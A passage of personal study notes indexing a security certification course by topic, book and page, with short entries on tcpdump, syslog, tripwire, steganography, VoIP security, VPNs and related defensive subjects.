SSO (Single Sign On )                    2    112     log on once per day,allow centralized management using LDAP,AD,Kerberos
SSTP (Secure Socket Tunnling Protocol)   5     15     SSTP,encapsulate packets in http,then encrypt using ssl
SSTP (secure socket tunnling protocol)   5    226     ssl/tls vpn require win2008server,no problems with nat or firewalls,see book
staff_r                                  6    202     admins are assigned to that role and are allowed to change to and from sysadm_r role
stairwell/door monitor                   1    220     direct employess to stairs,make sure there is no dangerous material,hand a flash light to emplyes
Standard - definition                    2     63      H/W and S/W related, more specific ,mandatory
Standard or Genric permission -NTFS      5     90
Stande-alone IIS box                     5    234
standered based protocol                 1      7     like internet access over IP and bluetooth network encapsulation protocol
star physical topology                   1     9      the only one that can prevent evasdrop,fault tolerance,scalability,support traffic isolation,confidentiality for traffic
star physical topology                   1     9      single point of failure,fault tolerance for cables only not for the faulty NICs
                                                      it is run by init and it is run one or more start-up scripts (run level scripts), which actually start programs and
start-up scripts/run level scripts       6    84
                                                      services that most users interact
STAT                                     6     65     ps output and it is current process status
STATD                                    6    105     rpc service run by client and server ,this service handle status of file lock
state flag                               3     58     identifies the relationship between the source and detination address
stateful firewall                        3     58     track te progress of the connection,no inspection of data is performed
stateful inspection ftp                  3     60     stateful firewall can track the ftp ,h.323 SIP connections
statetless firewall                      3     56     low end,very fast,can easily be bypassed,if ack is set existing connection
statstical sampling analysis             3    192     a mangeable subset of traffic is desirable alternative to complete failure when there's too much traffic
Steganography                            4    34      hiding the data in carrier file ( medium jpg,.doc,.wav,etc…)
Steganography - carrier or host file     4    34      used to hold the hidden data ,word ,bmp,jpeg,wav,movies,HTML files
Steganography components                 4    38      Host file(is thw medium used to hold the hidden data) and the carrier (image, word doc, movie, sound,...)
                                                      secrecy provides by stego is great but data protection is still relies on encryption algorithm used, always try to
Steganography Doesnot guarantee Safty    4    35
                                                      encrypt data before using stego
Stego types                              4    39      1- Injection, 2- Sunstitution, 3- generate new file
Stego-generate a new file                4    43      hidden data used to generate a New File, No fle host is needed
                                                  we place the information into "holes.", he meant,unused ares of the file, the biggest problem of injection type is that
Stego-injection                         4   40
                                                  the size of the carrier increases.
                                                  most popular method used and file size of the carrier remains the SAME by replacing useless data in the host file.
Stego-substitution                      4   42
                                                  Like: Least Significant bits (LSB) in the color table of a graphic
stiky bit                               6   38    delete only ur files not others file --> dir perm rwxrwxrwt
Stimulus vs. response                   2   206   Syn -->stimuls SYN/ACK -->response
                                                  operates on a single bit, highly dependent on the randomness of the keystream, keystream length must = plaintext
Stream Ciphers                          4   24
                                                  length, and have a vulnerability to Noise during transmission.
Stripping E-mail Attachment             2    44
structural assesment                    1   228   a detective control when taking old building
                                                  can happen from gradual sturtural weaking or sudden weaking,detective controls:structural assesment,sudden
structural failure                      1   228
                                                  imapct
structural gradual weaking              1   228   a result of a series of lesser events
structural sudden event                 1   228   may result from earthquacks,storms,explosions,sinkholes
Stunnel                                 2   273   is a generic proxy you can use to provide ssl capabilities ,can be used to hack SSL web sites
su <user>                               6   221   allow user to temperoary become another user
sudden structural failure               1   228   may result from earthquacks,storms,explosions,sinkholes
sudo                                    6   222
                                                  record the usage of su command, used by hackers to switch to usernames that have rlogin to other machines or su
sulog                                   6   128
                                                  to have root access, found in solaris and irix, /var/adm/sulog
superpolynomial                         4   51    an example of intractable problems, something between polynomial and exponential, more complex & hard.
support tools                           5   269   from windows installition cd cd:\support\tools\suptools.msi,win2000,2003
support tools list                      5   269   ********* 1 page**********
surveillance                            2   183   monitor network or conduct surveillance to gather info
SW testing                              2   240   run program in the intent of finding errors
swatch                                  6   152   log alert program
switch layer 3,7                        1    27
switched star netowrk                   1     9   best practise and the only one can prevent evesdropping
symantic ghost                          5    75   used to create binary disk images
Symmetric Encryption basic techniques   4    17   Basic techniques: Substitution, Permutation, Hybrid
Symmetric Key Cryptosystem              4    27   secret key encryption , Example, DES,3DES,AES,Blowfish,RC4,IDEA
Symmetric Key Cryptosystem              4    27   fast, require secure channel for key distribution, no technical non-repudation
syn flood                               3    29   filling a victim buffer with a lot of syn
synaptic                                6   166   synaptic/AWinApt GUI tools use apt to install,upgrade,remove pkg (debian)
synchronizing stream cipher             4    24   unpredictable to eavesdropper
SYN-RECV                                3    58   Second step in three way handshack,syn-ack received
SYN-SENT                                3    58   first step in three way handshack
sysadm_r                                6   202
sysinternals tools                       5     284     process explorer,autoruns,psexec,rootkitrevealer purchased by microsoft
SYSkey                                   2     130     MS protection mechanism use 128 bit hash
syskey.exe                               5     131     encrypt password hashes for accounts and private keys with 128bit rc4 key derived by passw
syskey.exe                               5     132     bestway to use password not to store locally
syslog                                   5     329
                                                       log major events, as su to root and failed login attemps, may need rool level to view logs generated by syslogd it's
syslog (messages)                        6     132
                                                       path /var/log/messages, solaris -->/var/adm/messages, Iris -->/var/adm/SYSLOG, HP-UX --> /usr/adm/syslog
syslog file fields ( messages)           6     133     date time hostname originating_program_name : msg_sent_to_syslogd
syslogd                                  6   134,135 daemon that accept incomming log msgs and deal with them according the rules found in /etc/syslog.conf
syslogd                                  6     134     any programe which wants to generate log messages may do so through calls to the syslog interface.
syslog-NG - drawback                     6     154     complex in configuration.
syslog-NG - switch from syslog to it     6     153     chkconfig --del syslog then chkconfig --add syslog-ng then stop syslog daemon and start syslog-ng daemon

                                                       syslog next generation replace to syslog (can't reuse syslog.conf), additional filtering (filter by hostname and actual
syslog-NG "next generation"              6     153
                                                       text of log msg using regular expression), send data with tcp, can support windows, not installed by default
syslog-NG config file                    6     153   /etc/syslog-ng and uses same facility and periority as the default syslog daemon
                                                     create destination(file) then create a filter based of facility,priority,hostname and presence or absence of string then
syslog-NG filter                         6   153,154
                                                     it create log rule based on filters and destination
syslog-NG installation                   6     153   yum install syslog-ng , install it in fedora
syslog-NG over tcp                       6     154   verify date so that it is guaranteed to make log to remote host,use encryption with stunnel
system boot                              6      81   how UNIX system boots: 1- bootloader, 2-kernel , 3-init, 4-startup script
system call interception                 3     232   hips software inserts its own process between application and os resources
System center mobile device mana         5      17   centralized control over windowes mobile
system log                               5     318
system restore automaticaly              5      76   after instal os,every24,before updates,before new sw,before new driver
system restore snapshot                  5      76   available on xp and later and not availabe for windows server2008
system restore win 7/vista.              5      77   include changed data files and older copies of folder "previous version tab"
system restore win xp                    5      77   registry settings,ini configuration files,some os files ,doesn't restore user data files
system sanpshot format                   5     307   section with labels,username and domain of who run the script
system services section of GPO           5     194   in disable service , disable the world wide wep publishing service
system snapshot                          5     306   collection of data that documents the configuration and running state of machine
system snapshot name                     5     307   computername_type_date
System Specific Policy                   2      71   specific for each system
system state                             5     71      include registry , boot-up files , other files depending on what services installed , schudule backup to run locally
TACACS (terminal access control*2 sys)   2     114     TCP based,CISCO Property--TACACS+
take ownership right                    5   123   only admins by default
Tamper - proof                          4    8
targeted policy enforcement             6   205   fedora 10 enforce MCS with targeted policy enforcement
tco of hips software                    3   234   additional burden of hips,need more processing & possible reduce of ur workstation lifecycle
tcp - (CWR) congestion window reduced   1   109   associated with protocol known as explicit congestion notification
tcp - (ECE) ECN Echo                    1   109
tcp - (fin) connection termination      1   111   graceful termination with fin,ack…abrupt closure rst/ack
tcp - aborted termination               1   114   tcpdump from aborted termination, using R flage
tcp - acknoweledge number               1   108   it specifies the sequence number of the next byte the reciever expect
tcp - graceful termination              1   113   tcpdump from graaceful termination using fin/ack
tcp - intial sequence number            1   108   a random or semi random value allow refering to bytes in packet
tcp - psh flag                          1   110   tells the reciever that a packet shouldnot be buffered ,telnet,SSH
                                                  important data is located by urgent pointer ,it's up to client to set it and up to server to decide what to do with
tcp - urgent flag                       1   109
                                                  it,telnet,rlogin
Tcp common ports                        1    99    ftp 20,21 telnet 23 smtp 25 dns 53 finger 79 http 80 pop 110 https 443
tcp connection                          1   104   use piggy backed packets a lot send many acks
TCP Finger-Printing                     3   117
tcp flags                               1   106   in the byte 13 ..URG,ACK,PSH,RST,SYN,FIN
tcp flags / code bits                   1   109   C, E, U, A, P, R, S, F
tcp full open                           3   128   default scan type for unprivilged users
tcp half open(syn scan)                 3   128
tcp header size                         1   105   normal size is 20 byte but if options used will be more than that
tcp header urgent                       1   164   like ctrl+c,tcp doesn't include the size of options
tcp options                             1   106   maximum segment size,windows scale,selective ack,timestamp,no operation (NOOP)
tcp options size                        1   165   tcp header length-min tcp header length
tcp payload size                        1   166   total length of ip-(length of ip header+length of tcp header)
tcp port 3389                           5   256   Remote desktop protocol
tcp vs udp                              1   116   different address spaces for both udp and tcp
TCP/IP packet generation                1    47
tcpdump                                 1   138   free,unix depend on libpcap,windump depend on winpcap,doesn't interpert events
                                                  it is one of the earliest sniffers, work on any OS talk tcp/ip, simple packet header analysis, can decode a few
tcpdump                                 6   191
                                                  protocols as NFS and DNS and show raw payload, filter and restrict what to view
tcpdump                                 6   192   can't decode the applications layer prtocols except: DNS, NFS
tcpdump ' tcp and port 1737'            6   191   make tcpdump with filter (put filter in single quote at the end of tcpdump command line)
tcpdump -nnp                            6   191   tcpdump -p Don't put the interface into promiscuous mode
TCPDump as NIDS                         3   195
TCPDump as NIDS adv. & disadv.          3   196
tcpdump cmd                             6   191   give one line per packet summary of each packet
                                                        timestamp, ethernet packet type(ip), source ip address.sourceport, destination ip.destination port, flags other
tcpdump fields                              6     192
                                                        than ack ("."), acknowledgement number,window size and tcp optios( between < >)
tcpdump icmp                                1     142   output format
tcpdump -ilo                                6     192   listen to loopback interface ( which is face network interface)
tcpdump -n                                  6     192   not make any dns lookup
tcpdump -nn                                 6     191   not convert protocol and port numbers etc. to names either
                                                        x hex output, -w write to file, -r read a file, -i specify the interface, -nn don't resolve ip and port, -s specify size of
tcpdump options                             1     139
                                                        packets
tcpdump -r [.pcapfile]                      6     191   ignore ur network interface and read packets from saved capture file
tcpdump tcp                                 1     144   in syn packet establising connection there is no data inside the tcp segment
tcpdump udp                                 1     143   the bytes field in the output indicate the no of bytes in udp payload
tcpdump -v                                  6     192   verbose mode so you can see the low level negotiation through more details of the packet
tcpdump -w [filename]                       6     191   save the packets that tcpdump capture to disk
tcpdump -X                                  6     191   see the packet payload and you'll get the hexadecimal and mostly readable payload content
                                                        is simply a utility that can be used for logging and intercepting TCP and UDP services startedby inetd or xined , host-
tcpwrapper                                  6   113,114 base network ACL system, used to filter network access to Internet Protocol on UNIX systems, can place banner on
                                                        any tcp or udp service
                                                        acts as a proxy between the client and the real service connection, can mointor & filter SYSTAT, Finger, FTP, Telnet,
tcpwrapper                                  6     114
                                                        Rlogin, Rsh, TFTP, Talk and …
                                                        with tcpwrapper installed (as tcpd ),all connection mush pass thru a set of rules before being allowed to connect to
tcpwrapper - After it ?                     6     116
                                                        the service, checked at /etc/hosts.allow, /etc/hosts.deny
tcpwrapper - Before it ?                    6     115   without host based firewall or ACL, access to service is a direct connection
technet script center                       5     289   to get scripts
technical control                           3     262   technology-based solution example(Firewall,IPS,anti-virus ,etc..)
Teredo                                      1      82   tunnling ipv6 over udp through NAT
Terminal services                           5     253
termination agreement                       4     240   used to minimize the problems that a dismissed employee could make.
TFN                                         3      29   a DDOS agent
tfn2k                                       3      29   a DDOS agent
TFTP (trivial file transfer protocol)       1      94   used to transfer files from one device to another without authentication
Threat                                      2     11      primary threats:Malware,Insider,Natural disasters,terrorism
threat                                      3     265     any event can cause undesirable outcome or someone exploit this weakness and compromis that system
threat concern                              3     100
                                                          patent tech for tipping point, use parallel field programmable gate array(FPGA), Asic H/W to perform deep packet
threat suppression engine (tipping point)   3     253
                                                          inspection
threat types                                3      99     worm ,virus,employee emailing intellectual property to a computer
Threats Vectors                             3     275     outsider attacks from (Network & telephone), insider attacks(local network & local system), malcious code
three-tier web application                 2   218   more secure,DID concept
throughput                                 2   271   no. of items processed /time unit
thwart XXS attack                          5   187
TIME                                       6   65    ps output and it is tilme the process start running
Time domain reflectometer                  1    22   a good cable tester to check the complience of cabling
time stamp and update sequence             5    32   in active directory on ever object if any conflict the later change override the earlier
tipping point IPS                          3   253   an Extra Widget, can limit traffic to apply QOS, block applications like peer-to-peer
tipping point IPS -- response mechanisms   3   253   Notify, Report, Limit, Block
                                                     one of the 802.1i protocols that provide: encryption, reply protection, integrity protection, work on the same WEP
TKIP - Temporal Key Integrity Protocol     4   167
                                                     H/W ship
TLS - Handshake protocol                   4    81   which is used to negotiate the details of secure session
TLS - Record Protocol                      4    81   which is used to securely transfer application data
TLS (transport layer security)             2   234   provide encryption,identity verification,data integrity,use port 443
TLS(Transport layer security)              4   127   SSL Steps from client to server
Toc/Tou                                    3    38   time of check:check the security, time of use :service time,race condition attack
Token                                      1    13   a specialised frame carry data
Token based Access control                 2   110   associates alist of object(data) and their privilge with users
Token ring                                 1    13   allocated time,each machine has an equal time to communicate,data travel in 1 way closed loop
Token ring communication                   1   13    an orginating machine put data into empty token then it go to destination until the orginating empty the token again
Token web Authentication                   2   249
Token-based devices                        2   142   triggered by the time of the day
toneloc                                    3   153   free,can skip numbers, war dialing tool
touch                                      6   213   to create files or update timestamps
Toxic dampers                              1   226   ventialtion systems equipped with them to prevent the toxic gas spreading through the vintilation system
toxins                                     1   225   Radon and carbon monoxide,use specialized detectors
toxins threat                              1   225   use a filtration masks,hermetically sealed vaults
TPM - Trusted privacy Module               4   121
TPM (Trusted Platform Module)              5   135   built in motherboard,random number generation,cryptographic operations
TPM Management                             5   135
tpm owner password                         5   139   string of ASCII ,saved to file,used only when managing tpm
TPM turn on                                5   134
TPM.msc                                    5   135
traceroute                                 1   125   unix use udp packets and windowes use icmp packets
traceroute,tracert                         1   124   incrasing ttl value by 1 each time and check the sender ip of error destination unreachable or time exceeded
                                                     easy problems that could be solved in a polynomial time, the relation between the input size and number of
Tractable problem example                  4   51
                                                     operations required to solve the problem is contant, linear, quadratic or cubic
traditional locks                      1   240   consist of metal lock and key,re-keying must be performed for all users
                                                 to ensure that the file system consistent in case of power failure or blue screen == Transaction oriented proceessing
transaction oriented processing        5   89
                                                 use CHKDSK.exe
transitive trust                       5   42    the trust passes through chain,
transport layer                        1   43    handle the sequencing and the provide reliable end to end connectivity
Transposition                          4   21    also called Permutation, change the character from its position not the char itself.
trap doors                             3   28    are bits of code embedded in programs by programmer to gain access at a later time (backdoor)
                                                 it's a mathematical functions which are easy to calculate and very difficult to inverse calculation like: (Multiplication
trapdoor function & example            4   28
                                                 & factorization) and (Exponential & Logarithms), used in Diffie Hellman
                                                 allow message to be decrypted using different key than one used to encrypt the message. If the mgs encrypted by
trapdoor function & example            4   50
                                                 public key, then the trapdoor is the private key
trcpwrapper                            6   117   can also perform double-reverse ip address lookup, bannering system, additional logging capabilities
trcpwrapper                            6   118   can alert the network admin of suspicious activity by sending SMS or Mail to the Admin
trinoo                                 3    29   a DDOS agent
Triple DES                             4    61   last release, can be configured to use either 2 or 3 unique keys, 112-bit (2keys), 168 (3 keys)
Triple DES                             4    61   execute 48 rounds (3 * 16 round)
Tripping point                         2    45   tool use signature and behavior to examin network traffic
tripwire                               3   220   is a file integrity check as a HIDS, & can react to changes to monitored files by restoring backup as a HIPS.
                                                 intrusion detection through integrity checking, have 2 versions: (commercial & open source), create secure db of
tripwire                               6   171
                                                 file and dir attribute, can include MD5 signature for data verification
tripwire log file attribute            6   172   access time,mod.time,size,inode creation time,content
tripwire -mc -v                        6   173   run tripwire in check phase with verbose output
tripwire -mi -v                        6   173   run tripwire in init phase ( create db) with verbose output
tripwire perm and file mode attr       6   172   inode,no of links,user,group
tripwire portable db                   6   171   tripwire create digital snapshot of file and/or dir and places,db should maintained off-site and secure
tripwire steps                         6   173
Tripwire Sw                            2    43   make integrity check
trojan horses                          3    28   helpful entraintaing programs that perforam actions user didn't intened
true negative                          3   171   true ok ,ids doesn't generate alaram for this
true positive                          3   171   true hacking
trust direction                        5    42   access to resource goes in the opposite direction of trust direction
trust nature                           5    41
Trust Relationship                     3    8    mean I trust the information and connection that come from another familiar computer (didn't require password)
trusted platform module intializatio   5   135   enable bios,turn on windows then intialize windows with owner password
Trusted Sites Zone                     5   186   define exceptions to permit dangerous features for URLs that you trust
                                                 if you need to capture and decode the app. Layer but don't have access to graphical display, it display one-line-per-
tshark -i{interface}                   6   193
                                                 packet as tcpdump but it gives app layer decode that tcpdump generally won't
two-tier web application             2   218   combine the presentation and application in one tier,for small business,difficult to secure
twprint -mr --twfile filename        6   173   read tripwire report
Type I, A error                      2   144   False Reject Rate, the percentage of legitimate user falsely rejected
Type II,B error                      2   145   False Accept Rate, the percentage of reading in which the system accepts unauthorized user
UAC (User Account Control)           5    11   to warn users when malware attempt to exercise their admin rights
                                               debian linux,desktop&server,install in 40 language,(amd64,i386,ultrasparc,powerpc) supported arch,APT(for
ubuntu                               6   19
                                               package management),no GUI firewall and isn't configured by default
ucredit=$                            6   60    minimum no of uppercase letter is $ in/etc/pam.d/system-auth in pam_cracklib argument
UDP                                  1    92
udp checksum                         1    92   optional and not required,check the data and header,not optional for ipv6
udp file transmission                1    93   netbios used udp to transfer local files
udp header                           1    95   size = 8 byte
udp multicast                        1    93   udp is used for multicasting because tcp is hard to be used in such enviroments
udp port numbers                     1    93   dns=53,bootp=67,68 ,tftp=69,ntp=123,nbt=(137-139),snmp=161and162,nfs=2049
udp scan                             3   128   nmap relies on receiving icmp messages,slower than tcp scans
Uiform protection                    2   15    all part of org receive equal protection,vulnarable to inside, weakest
unauthorized access                  1   236   deternet controls to prevent it using guards ,signs,employee only signs
unauthorized access - Detecting      1   243   CCTV, Watch towers, Motion detector, heat sensors
unauthorized access - Deterring      1   242   fences, X-ray scanners, Metal detector, Bag inspection
unauthorized access - Preventive     1   239
UNC (Universal Naming Convential )   5   104   full path to the network share
unity one product                    3   245   tipping point Nips product can handle >2gb throuput with latency less than one millisecond.
                                               can contain members from any domain in entire forest ,can include user accounts == have users from different
universal group                      5   97
                                               domains
universal group (security)           5   100   only available in AD native mode
unkonwn port                         3   125   is not-well known port so nmap can't tell what running on it
unlock account (Linux)               6    62
up2date                              6   160   automatioc update tool ( redhat update agent)
up2date                              6   166   GUI tools use rpm to install,upgrade,remove pkg (redhat & fedora)
update iso file                      5    60   microsoft bundle latest updates and patches in one single iso file
update.msi                           5    56   use by built in windows installer service on each machine to handle installation process
UPS (uninteruptable power supply)    1   232   installed inline-sufficient power to (15-30)min
URL encoding                         2   228
URL Format                           2   222   URL (<Protocol>://<Server name or address>/<Resource Name>
urlscan.dll                          5   245   free application firewall for iis5/6 scan http requests and reject bad requests
                                                how normal users could run SW in higher previ ,, GPOs used to control it,standard&admin users ,, how to turn it off
                                                ,, how it work using users &process mic lables ,, how to run as admin ,, Standard user process: medium or low MIC
user account control                  5   179
                                                label:::SAT stripped of dangerous priv. ,, Administrative user process: high or system MIC label:::standard SAT for
                                                admin group member ,, UAC can be managed or turned off via group policy
user configrations /GPO               5   153   applied to current user desktop
user rights                           5   118   general captability not tied to any object == rights for user on the whole machine not specific obj
user rights allow/deny user o group   5   122
user rights backup/restore            5   124
user rights-managed by GPO            5   118   (local sec policy-local policy-user rig
user_r                                6   202   all users assigned to that role
useradd                               6    54   add user to the system and it update /etc/passwd, /etc/shadow, /etc/groups file
usermod -U                            6    62   unlock account
usermod -L                            6    62   lock account
                                                binary log file, keeps track of users currently looged, used by (w, finger, who) commands, updated by login
utmp log                              6   125
                                                program, world writeable so it is inaccurate /var/run/utmp
UTP                                   1    21
Validate                              2   242
vampire tap                           1    22   to see all traffic in coaxial without having to reconfigure switch
VCI (Virtual Channel Id)              1    16   associate cells with virtual connection across an ATM network
Vector-Oriented DID                   2    18   threat requires a Vector to cross the vuln, shutdown it . Ex USB,Auto answer modems so disable it
vectors                               3    99   outside attack,inside attack,attack from malcious code
ventilation exhaust systems           1   225   they expel the air in areas served by air-conditioning either by natural or by fans
Verisign                              4   115   a certification authority
VERITAS of backup Exec fame                69
Vertical markets of wireless          4   146   Healthcare, Financial, Academia, Factories/industrial, Retail, Wireless ISP
virtual machine application level     1   176   running application on a vm will prevent attackers from attacking the host system
virtual machine os level              1   176   like win vm,good because some tools don't work on specific os
virtual machine types                 1   181   virtual pc from microsoft,parallel from macintosh
virtualization                        1   174   general term for abstraction of resources to overcome the 1: relationship between os and hw
virtualization platform               1   174   taking a software platform and running multiple platforms on a single hw,like virtual machine
virtualization resource               1   175   to virtualize hardware like the database ,each system is sharing the same hw but doesn't know that
Viruse                                2    21   malware able to replicate,is parasitic it must attach to another program
Vlan                                  1    29   create seprate networks through software not hardware
vmware ace captability                1   187   ace feature allow you to put vm on a usb flash safely
vmware extentions                     1   182   .vmx vm configuration,.nvram vm bios,.vmdk vm disk file,.vmss suspended state fiel,.vmsn snap shot file
vmware fusion                         1   191   unity feature allow you to run windowes applications on mac
vmware player                         1   184   free run on win,linux,fully compatible
vmware workstation                                 1     186   ability to create snapshots,cloning,secure portability of vm
                                                               reporting statistic about RTP session including jittermpacket loss ….and can control flow of information between two
VOIP - real-time control protocol RTCP             4     220
                                                               VoIP
                                                               cost savings, voice compression: T1 support max 24 circuit switches conv with compressing it we bettter utilize BW
VOIP - advantages 1                                4   202-203
                                                               in packet
VOIP - advantages 2                                4   202-203 switched net, we can reduce BW from 64 kbps/call->6 kbps/call, new services"Click to Call", Location independence
VOIP - architecture=>                              4   208-209
VOIP - architecture=> IP PBX/PSTN intergration     4     208   all users utilize VoIP phone to connect to IP PBX and IP PBX connect with PSTN
                                                               PBX connected PSTN with VoIP.VoIP connect multible PBX together to provide connectivity to end-user with VoIP
VOIP - architecture=> PSTN PBX/VoIP intergration   4     208
                                                               phone
                                                               also known as "walled garden".VoIP network connect with another VoIP using hostname or IP for dialing instead of
VOIP - architecture=> pure VoIP networks           4     209
                                                               phone #
VOIP - architecture=> VoIP/PSTN ISP                4     209
VoIP - as a smart network                          4     203   provide possibility for new features & services
VoIP - call Hijacking                              4     228   where attacker takes over the identity of legimate user.
VOIP - call operation                              4     212   call setup next next directed connection through proxy server
VOIP - CID "Caller ID"                             4     217   CID (caller id info), included in the Msg header
VoIP - CID spoofing and privacy attack             4     226
VoIP - click-to-call                               4     203   click on URL of website to initiate call over VoIP network
                                                               Media gateways, Registration and Location server, Proxy servers, Message Servers, End-user device, VoIP
VOIP - components                                  4   210-211
                                                               phoones, FXS, soft phone
VoIP - configuration error                         4     198
VOIP - delay types                                 4     205   1-accumulation delay (algorithm delay). 2- proceding delay . 3- network delay
VoIP - disadantage => delay                        4     204   Echo , Talker overlap
VoIP - disadantage => echo compensation            4     206
VoIP - disadantage => jitter                       4     205
VoIP - disadantage => lost-packet compensation     4     205
VOIP - disadantage =>quality assurance challenge   4     204
VoIP - DoS vulnerability -SIP cancel               4     227   by sending SIP cancel.
VOIP - E911 location reporting                     4     224   couldn't determine the caller location for emergency purposes.
VoIP - External attacks                            4     197   DOS and external attacks
VoIP - impersonation                               4     226
VoIP - improper change management                  4     198
VoIP - Internal misuse                             4     197   sniffing voip traffic
VOIP - LAN                                         4     199   LAN is more reliable and faster than WAN
VoIP - limited HID                                 4     227
                                                               the firewall pass SIP to setup call then recipient answers the call, the RTP attemp to contact internal ip but stateful
VOIP - Nat challenges                              4     224
                                                               FW drop unless it does inspection
VOIP - operation challenge                    4   224
VoIP - packetized                             4   201
                                                        Signaling (H.323, SIP), Media (RTP), Supporting (necessary protocols to support VOIP signaling and media "TCP,
VOIP - protocols                              4   214
                                                        UDP, IP")
VoIP - provider taxation                      4   225   taxation due to losses caused to the telecom providers.
VOIP - quality concern                        4   224
VOIP - RTP "real-time protocol "              4   220   used to transport packetized voice, end to end protcol, does not need to traverse gateway srvr, commonly UDP,
                                                        1-Audit implementation to assess traffic pattern, 2-tunnel traffic with IPSEC, 3- use firewalls that understand
VOIP - securing best practice                 4   229
                                                        SIP/H.323, 4-Monitor logging data, 5- Isolate VOIP traffic on dedicated channel
                                                        CID Spoofing, Phone impersonating (Limited Strong Auth. "weak PIN", SIP Digest dictionary attacks), DOS (SIP
VOIP - security challenge                     4   226
                                                        cancel), Implementation attacks (Vulnerabilities)
VoIP - service interruption                   4   198   due to Network BW, QOS, Power failure
VOIP - Signaling - ASN.1                      4   215   for specifying data that can be challenging to implement securely in a modular or "light weight" fashion
                                                        provide both Voice & Vedio, use UDP or TCP, standard by ITU and based on ASN.1 "Abstract Syntax Notation"
VOIP - Signaling - H323                       4   215
                                                        standard
VOIP - Signaling - H323                       4   215   is a set of protocols include: H.225, H.245, H.235, H.239
VOIP - SIP packet details                     4   217   All in ASCII strings, 1- Rquest Line (register , invite , ack, cancel, bye, options), 2-Msg header, 3- msg body (optional)
VOIP - SIP packet Exchange                    4   218   see diagram @ book
VOIP - SIP packet=>meesage body               4   217   protocol negotiation details,encoding ,echanism (for compression),IP address info.
VOIP - SIP packet=>message header             4   217   information indicating the source and destination of call,and caller indentification information (CID )
VOIP - SIP(Session initialization protocol)   4   216   similar to HTTP's GET and POST methods. Most implementation of SIP over UDP for performance.extensible
VOIP - source of delay                        4   205
VoIP - system malfunction                     4   198
VOIP - TCP vs UDP                             4   221   UDP is preferred for VoIP network because it has less overhead (smaller header size and no ack)
VoIP - theft                                  4   197
                                                        call setup stream & Voice stream, once the setup phase has completed, caller "Bob" creates direct connection to
VOIP - traffic patterns                       4   212
                                                        receiption Alice to avoid latency
VOIP - Voip networking                        4   201   combine data voice, to extend voice over packet-switching, the motivator for implementing it is ROI
VOIP - WAN                                    4   200   quality may vary significantly.
VOIP - wiretapping support                    4   225   eavesdropping
VOIP disadvantage=>reliability&availability   4   207
VOIP overview                                 4   196
                                                        internal risk, internal misuse, theft, system malfunction, service interrupting, service interruption, congif error,
VOIP risk(Key Risks)                          4   197
                                                        improper change management.
VoIP -SIP digest authentication attack        4   227   attacker sniff the passwd hash & brute force it offline.
volume shadow copy system                   5    73     allow to copy files that is opened or in locked case
VPI (Virtual Path Id)                       1    16     VPI and VCI used to route ATM cells between swiths
VPN - advantage                             4   86-87   Flexibilty, Lower cost than leased lines.
VPN - disadvantage                          4    88     IPS cannot examine the information in message(because of encryption),therefore QoS for VPN is more difficult
VPN - GRE                                   4   101     to securly bridge any non-ip networks (IPX, Appletalk) over an IP network
VPN - L2F                                   4   101
VPN - L2TP                                  4   102     to securly bridge dial-in users.
                                                        Helps to provide QOS over tranditional ip service, QoS require to look into the message to decide which message
VPN - MPLS(multiprotocol lable switching)   4    88
                                                        has high priority but this cann't because encryption(mpls/vpn)
VPN - PPTP                                  4   101
VPN - Remote access type                    4    89     client to site , site to site , client to client
VPN - security problems                     4    90
VPN - Virtual private network               4    85
VPN => Client to client                     4    89     not used more
VPN => Site - to - Site (tunnel)            4    89
VPN =>Client - to - site (transport)        4    89
vpn client software                         5   228     built in win,vpn tunnel like interface,suppot smartcard,logon desktop via VPN
vpn interface                               5   228     like any regualr interface for vpn connection ,Desktop logon
vpn require pptpv2                          5   229
VSZ                                         6    65     ps output and it is process size
Vulnerabilities                             2    12     Weakness in the system,(known,unknow,zeroday)
vulnerability                               3   265     is a weakness in the system can be xploited or weakness that could lead to system compromise
vulnerability analysis                      3   281     risk management step3,new discovered and old
vulnerability axioms                        3    98     5,Vuln are gateways for threats, little scanning little removing
vulnerability false positive                3   161     a subsequent pen test can vertify where these false positives can be ignored
vulnerability scanners                      3   131     scan your own systems,scan,report
w command                                   6   126     use utmp log file, it's output is: ( user, TTY, FROM, LOGIN@, IDLE, JCPU, PCPU, WHAT )
wan                                         1    7      Large geographic area,use public networks,
                                                        it may be necessary to implement aggregation devices to support multiple wan links and support multiple wan
wan aggregation                             1    18
                                                        protocols.
WAN technologies                            1    17
war dialing                                 3   152     identifying systems with modems sitting inside the network
war dialing mitiagating                     3   154     monitor call logs,use honeypot,scan and take action
war driving                                 3   150     is driving with the equipment to detect wireless networks
Warefare and Terrorism                      2   200
Warefare affecting US Presidency            2   198
warrant                                     2   179
water/flood                                 1   227     detective controls:mositure-humidiity sensors,corrective controls:bilge pump,evacuation
Wayback                            4   262   www.archive.org, this website takes snapshots of your website few times a year.
wbadmin.exe                        5    73   2008 and later,optional ,can copy locked files,backup system state,volumes
Web architecture Hardening         2   220   separate data and logic from presentation layer,FW&DMZ,server&DB hardining,HIDS,backup
web - configuration management     2   241   Separate workplaces, Version control system
web - Front page MS                2   250   have more vulnerability cause DOS
web - Performance testing          2   241   can stand with DOS
web - staging and deployment       2   241   before move code to production separate team must test it again
web - Version contol               2   241   track changes of the code and not overlab
                                             u must limit access to ur web site,keep usr out (default pages,code library,disable directory browsing,URL directory
web access control                 2   250
                                             traversal )
Web application architecture       2   218
Web application Secure             2   240
Web Authentication                 2   247   HTTP Authentication (basic mode,digest mode), Form based Authentication
Web Authentication attack          2   248   brute force-account lockout,bypass authen-chk first usr logged,
Web communications                 2   217   Stateless comm.,retriving info.by GET,HEAD,Sending info by POST,PUT
web- cracking tools                2   273   Web Browsers, Stunnel , Brutus, Achilles, Libwhisker, Nikto
webdav                             5   247   manage http can use ssl
webdav ,SMB                        5   126
webscarab                          2   278   proxy ,HTTP,HTTPS,cookie analyze,session id detect
welcihia                           3   118   Aug-03
                                             weakness in the key scheduling algorithm of RC4, Attacker could recover the shared secret from nothing more than
WEP - security issues              4   165
                                             the encrypted data collected from wireless network
WEP - tools attack                 4   166   WEP crack , Airsnort , dwepcrack ,wnet/reinj , wepwedgie
                                             file integrity (Tripwire) ,performance,logs. Types: Defacement monitoring , Availability monitoring, Performance
wep applicaiotn monitoring         2   270
                                             monitoring
wep application service provider   2   244   SLE,patch Audit every 6 month,vuln scan
wep vulnerabilities                2   246
wfas                               5   211   windows firewall with advanced security ,ICF internet connection firewall old edition
wfas                               5   212   no support for automatic upload to central server
WFAS block all connections         5   214   all inbound connection will be blocked even there is a rule that allow them
WFAS log pfirewall.log             5   214   text file in W3c format,maximum log size is 32mb
wfas rule processing               5   217   best rules that matches win
